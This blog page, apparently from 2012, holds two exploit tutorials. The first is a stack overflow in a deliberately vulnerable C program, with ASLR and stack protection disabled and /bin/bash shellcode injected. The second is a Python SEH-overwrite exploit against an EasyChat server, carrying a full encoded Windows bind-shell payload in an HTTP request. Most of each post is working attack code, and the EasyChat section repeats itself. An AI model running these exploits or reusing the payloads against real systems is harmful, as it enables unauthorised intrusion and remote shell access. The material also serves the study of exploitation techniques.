Jumat, 24 Februari 2012

EXPLOITASI BACTRACK R2 ( Stack overflow )

1. Turn Off  " ASLR Linux "

root@justview:~# cat /proc/sys/kernel/randomize_va_space
root@justview:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@justview:~# echo 0 > /proc/sys/kernel/randomize_va_space

2. Create Vulnareable application :

Open Your Editor write this Vulnareable application


##############################
// I am a vulnerable thing.
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]); // Vulnerable function!
return 0;
}
##############################

After that please save with name vulnareable.c


3. Compile the application

show result

4. Run application

Ok Let's Run command to Overwrite this applciation with characters 41

(gdb) run $(python -c 'print "\x41" * 600')


After we RUN we can't see Overwrite of EIP, because gcc 3.x and 4.x by default compile code using a protection technique called “stack-smashing. this protection available on default of all system operation linux.
It is therefore we must turn off SSP.

5. Turnn off SSP

Open NEW TAB

root@justview:~# gcc -ggdb -o vulnareble -fno-stack-protector -mpreferred-stack-boundary=2 vulnareble.c


 6. RUN again the application


root@justview:~# gdb vulnareble

send again your fuzzer

(gdb) run $(python -c 'print "\x41"*600')




we can see that we success to overwrite eip with our character 414141. Next we create dummies with ./pattern create to create string characters as many as 600.

7. Create pattern



root@justview:/pentest/exploits/framework/tools# ./pattern_create.rb 600 > string_pattern.txt


Open the file using kwrite :



after that copy the characters into your fuzzer

8. Using the 600 characters to know address of registers EIP


we get information about on how many bytes to EIP crushed    ( 0x41387141 )

9. Using pattern_offset to know bytes

we know at 504 bytes the EIP was crushed. so we on 4 bytes so in the next 4 bytes will enter the address esp coz. 508

10. change back our fuzzer

(gdb) run $(python -c 'print "\x41"*508')



ow we success to control EIP and ESP.

11. Let's search address of ESP



On this case we will make 323 bytes of junk + a shellcode which is 45 bytes = 368 bytes.
508 bytes - 368 bytes = 140 bytes.
So after the shellcode we still have 140 bytes, we divide 140 with 4 (to fit an entire memory address:
\x41\x41\x41\x41 for example.) and get 35.

we get address of registers ESP 0xbffff16c

Now open your Kclac (calculator)
0xbffff16c - 200


12. Generate Shellcode
Download here generate shell



After we get shellcode

change your fuzzer


run $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x6c\xef\xff\xbf" * 35')
Starting program: /root/vulner $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x6c\xef\xff\xbf" * 35')

after you run then result


if you found this condition.. you must Quit and run again your fuzzer.

then  try change value of fuzzer 370 and get result..



after try change again velue of fuzzer 301 finally i success..


GOOD LUCK
Try Harder..




































Diposting oleh di Tidak ada komentar:

Rabu, 22 Februari 2012

EXPLOIT EasyChat ( S E H )

I.    INFORMATION GATHERING
while waiting result of wireshark, open application





Result Of WireShark







II. Service Enumuration

Port 80

SSL Port 443

III. Vulnerability Identification

GET /chatsubmit.ghp?username=heril&password=heril&room=1 HTTP/1.1"
(this information by Wireshark) we know that we can sending fuzzer with port 80 and Header GET /chat.ghp?username=heril&password=heril&room=1 HTTP/1.1"/.



IV. Exploitation

1.    making Fuzzer

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 30000
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

run fuzzer and when application crash choose view + seh chain


making pattern_create 30000


2.    Edit Fuzzer

import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="your pattern_create"
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

run fuzzer and when application crash choose view + seh chain

then


3. search Module

choose view + executable module
and choose SSLEAY32
Click double
and follow my ways




4. Edit your Fuzzer

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 216
tes+="\xEE\xEE\xEE\xEE"
tes+="\xB6\xB2\x01\x10"
tes+="\x90" * (30004-len(tes))
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

Run again your fuzzer when the application crash choose view + seh chain + press F2
then press Shift F9 
pres F7 + F7 + F7


Lookat position POP POP RETN.

edit fuzzer

I.    INFORMATION GATHERING
while waiting result of wireshark, open application





Result Of WireShark







II. Service Enumuration

Port 80
SSL Port 443

III. Vulnerability Identification

GET /chatsubmit.ghp?username=heril&password=heril&room=1 HTTP/1.1"
(this information by Wireshark) we know that we can sending fuzzer with port 80 and Header GET /chatsubmit.ghp?username=heril&password=heril&room=1 HTTP/1.1"/.

IV. Exploitation

1.    making Fuzzer

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 216
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

run fuzzer and when application crash choose view + seh chain


making pattern_create 30000
2.    Edit Fuzzer

import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="your pattern_create"
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

run fuzzer and when application crash choose view + seh chain

then


3. search Module

choose view + executable module
and choose SSLEAY32

Bad value in module 4,5,6,7,C,3 and F
we will try Search Bad value in SSLEAY32 Module of applocation

copy ssleay32.dll into /pentest/exploits/framework
then
root@justview:/pentest/exploits/framework# ./msfpescan -i ssleay32.dll 

we don't found bad value, so we will make this module.
Click double
and follow my ways





4. Create Shellcode & Edit your Fuzzer

Open your Browser
Choose Windows Bind shell






#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 216
tes+="\xEB\x06\x90\x90"
tes+="\xB6\xB2\x01\x10"
tes+="\x90" * 16
tes+=("\x33\xc9\xb1\x51\xda\xcb\xb8\xa7\x84\x38\x6a\xd9\x74\x24\xf4\x5b"
"\x31\x43\x13\x03\x43\x13\x83\x4c\x78\xda\x9f\x6e\xeb\xf0\x2d\x66"
"\x15\xf9\x51\x89\x86\x8d\xc2\x51\x63\x19\x5f\xa5\xe0\x61\x65\xad"
"\xf7\x76\xee\x02\xe0\x03\xae\xbc\x11\xff\x18\x37\x25\x74\x9b\xa9"
"\x77\x4a\x05\x99\xfc\x8a\x42\xe6\x3d\xc0\xa6\xe9\x7f\x3e\x4c\xd2"
"\x2b\xe5\x85\x51\x31\x6e\x8a\xbd\xb8\x9a\x53\x36\xb6\x17\x17\x17"
"\xdb\xa6\xcc\xa4\xcf\x23\x9b\xc6\x2b\x28\xfd\xd5\x05\x8b\x99\x52"
"\x26\x1b\xe9\x24\xa5\xd0\x9d\xb8\x18\x6d\x1d\xc8\x3c\x1a\x10\x86"
"\xce\x36\x7c\xe9\x19\xa0\x2e\x73\xce\x1e\xe3\x13\x79\x12\x31\xbc"
"\xd1\x2b\xe5\x2a\x11\x3e\xfa\x91\xf5\x3e\xd5\xba\x7c\x25\xbc\xc5"
"\x92\xae\x43\x90\x06\xad\xbc\xca\xbf\x68\x4b\x1f\x92\xdc\xb3\x09"
"\xbe\xb1\x18\xe6\x12\x75\xcc\x4b\xc6\x86\x22\x2d\x80\x69\x9f\xd7"
"\x03\x03\xfe\x82\xcc\xb7\x1b\xdc\xcb\xef\xe4\xca\xbe\x1f\x4a\xa7"
"\xc1\xf0\x04\xe3\x93\xdf\x3d\xbc\x14\xc9\xed\x17\x14\x26\x79\x72"
"\xa3\x41\x33\x2b\xcb\x98\x94\x87\x67\x70\xea\xf7\x1b\x12\xf3\x8e"
"\xdd\x9a\xac\x8f\x34\x09\xac\xbf\xdf\xd8\x36\x59\x48\x7e\xda\x2c"
"\x6d\xea\x74\x77\x47\x27\xfd\x60\xfd\xf3\x77\x8c\x33\x3c\x74\xfa"
"\xca\xfe\x56\x04\x70\xd3\x3b\x75\x0f\x13\x97\x2e\x5b\x0b\x95\xce"
"\x2f\xda\xa6\x5b\x14\x1c\x8e\xf8\xc3\xb0\x7e\xaf\xba\x5e\x80\x1e"
"\x6c\xca\xd3\x5f\x5e\x9c\x7e\x46\x5a\x93\xd2\x87\xb3\x41\x2a\x88"
"\x0b\x69\x04\xfd\x23\x69\x26\xc5\xa8\x6e\xff\x97\xcf\x41\x68\x69"
"\xe8\x80\x1a\xc6\xf7\x93\x22\x38")
tes+="\x90" * (30004-len(tes))
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()






Run again fuzzer 


GOOD LUCK





































Diposting oleh di 1 komentar:
Langganan: Komentar (Atom)